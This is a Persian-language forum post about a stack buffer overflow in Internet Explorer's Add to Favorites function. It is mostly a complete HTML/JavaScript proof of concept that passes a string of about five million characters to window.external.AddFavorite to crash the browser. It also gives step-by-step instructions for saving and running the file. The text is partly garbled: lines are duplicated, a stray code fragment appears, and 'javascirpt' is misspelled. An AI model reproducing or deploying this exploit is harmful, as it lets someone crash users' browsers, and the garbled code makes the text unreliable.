۲۰-تير-۱۳۸۸, ۱۵:۰۴:۴۸
این حفره امنیتی که از نوع Stack Buffer Overflow میباشد و در بخش :
Favourites وجود دارد که هکر با دادن یک ادرس با , میتواند موجب کرش کردن مرورگر شود :
یک فایل متنی باز کرده و متن زیر را کپی کنید :
با پسوند html یا html ذخیره کرده با IE باز کنید
حالا کافیه روی Add To Favorites کلیک کنید
سوالی بود بپرسید
Favourites وجود دارد که هکر با دادن یک ادرس با , میتواند موجب کرش کردن مرورگر شود :
کد:
('http://'+str,'Crash')کد:
<html>
<head>
<script language="javascirpt" type="Text/javascirpt">
function go()
{
var str =unescape('%u4141');
var finalstr = createInlineBuffer(str, 5150000);
var len = finalstr.length;
document.write(len);
addfav(finalstr);
}
/* Effient in-line creation */
function createInlineBuffer (str, num) {
var i = Math.ceil(Math.log(num) / Math.LN2);
res = str;
do {
res += res;
} while (0 < --i);
return res.slice(0, str.length * num);
}
/* Vulnerable Function */
function addfav(str)
{
if (document.all)
{
window.external.AddFavorite
('http://'+str,'Crash')
}
}
</script>
</head>
<body>
<a href="javascirpt:go()">Add To Favorites</a>
</body>
</html>با پسوند html یا html ذخیره کرده با IE باز کنید
حالا کافیه روی Add To Favorites کلیک کنید
سوالی بود بپرسید